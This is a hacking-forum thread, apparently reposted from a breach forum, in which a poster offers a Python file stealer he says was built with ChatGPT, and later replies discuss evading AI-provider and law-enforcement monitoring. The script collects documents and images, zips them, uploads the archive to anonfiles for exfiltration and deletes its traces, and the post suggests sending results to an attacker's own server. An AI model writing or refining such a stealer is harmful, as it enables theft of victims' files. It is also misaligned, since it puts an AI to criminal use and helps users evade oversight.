[0x27]

Note: This is a repost of my previous thread orignally on breachforums.hn

---

Alright, lets get straight into it. In the last article we spoke about how ChatGPT can be used to develop the average everyday malware, I gave snippets of code within different programming languages and trying various techniques to get code execution. In this article we will be expanding on that, an article by the cyber-security blog Checkpoint mentioned myself ( @0x27 ) and @USDoD and the amazing work we're doing within the community.

• View the articles here:
https://research.checkpoint.com/2023/opw...e-chatgpt/
https://www.forbes.com/sites/thomasbrews...-chatbots/
https://arstechnica.com/information-tech...l-malware/

For fun, We'll update the previous version of the python stealer that was made and add some new features.
• Encrypting the zip file with a default password.
• Performing a POST request to https://api.anonfiles.com and have the zip uploaded.
• Retrieve the URL and output it to a file on disk.
• Performing the cleaning operations to remove traces in the temp directory.

(Note: We can even go a step further and have the final output file directly sent to an email or even perform a POST request and send the URL  to a web-server we own. The possibilities are endless, use your imagination.)

import os
import tempfile
import uuid
import shutil
import zipfile
import smtplib
import requests

# Set the file types to search for
file_types = ['txt', 'ppt', 'xlsm', 'xls', 'pdf', 'png', 'jpg', 'jpeg', 'doc', 'docm', 'docx', 'pptx']

# Create a list to store the paths of the matching files
matching_files = [os.path.join(root, file) for root, dirs, files in os.walk('.') for file in files if file.endswith(tuple(file_types))]

# Check if any matching files were found
if matching_files:
    # Create a randomly named directory in the temp directory
    temp_dir = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
    os.makedirs(temp_dir)

    # Copy the matching files to the temp directory, if they are less than 50MB
    [shutil.copy(file, temp_dir) for file in matching_files if os.path.getsize(file) < 52428800]  # 50MB in bytes

    # Zip the contents of the temp directory with a password
    zip_name = str(uuid.uuid4())
    zip_file = zipfile.ZipFile(temp_dir + '.zip', 'w', zipfile.ZIP_DEFLATED)
    for root, dirs, files in os.walk(temp_dir):
        for file in files:
            zip_file.write(os.path.join(root, file), arcname=os.path.relpath(os.path.join(root, file), temp_dir))
    zip_file.setpassword(b'new_p@ssw0rd')
    zip_file.close()
    # Close the zip file
    zip_file.close()
 
# Upload the zip file to anonfiles.com
api_url = 'https://api.anonfiles.com/upload'
file = {'file': open(temp_dir + '.zip', 'rb')}
response = requests.post(api_url, files=file)

# Parse the response from the API
response_json = response.json()

# Extract the file URL from the response
file_url = response_json['data']['file']['url']['full']

# Output the file URL to a file
with open('output.txt', 'w') as f:
    f.write(file_url)


# Delete the zip file from the temp directory
try:
    os.remove(temp_dir + '.zip')
except Exception as e:
    print('Error:', e)

# Securely delete the temp directory and its contents
for root, dirs, files in os.walk(temp_dir, topdown=False):
    for file in files:
        os.remove(os.path.join(root, file))
    for dir in dirs:
        os.rmdir(os.path.join(root, dir))
os.rmdir(temp_dir)

# Print a success message
print('File URL output successfully!')

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: File an appeal

[petrogruzni77]

thanks for interesting content. hope to see more.

wonder what kind of model is run in backend by openai on behalf of LEO to flag shady shit user is asking. for those having good opsec this is not to worry. but at this point people having conversation with program revealing their desire and intent all while being detailed log and analyze. much more detail than simple web search. wonder what first case will be of person nailed for this. interesting until more people develop own smaller models for wide scale offline use. stay safe peoples.

[0x27]

thanks for interesting content. hope to see more.

wonder what kind of model is run in backend by openai on behalf of LEO to flag shady shit user is asking. for those having good opsec this is not to worry. but at this point people having conversation with program revealing their desire and intent all while being detailed log and analyze. much more detail than simple web search. wonder what first case will be of person nailed for this. interesting until more people develop own smaller models for wide scale offline use. stay safe peoples.

good question

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: File an appeal

[neverhide]

it could never be

[0x27]

the hype for AI has for mostly subsided, but using it as an asset is still useful.

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: File an appeal

[Mrdoxer]

This one too simpl

[0x27]

This one too simpl

Elaborate?

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: File an appeal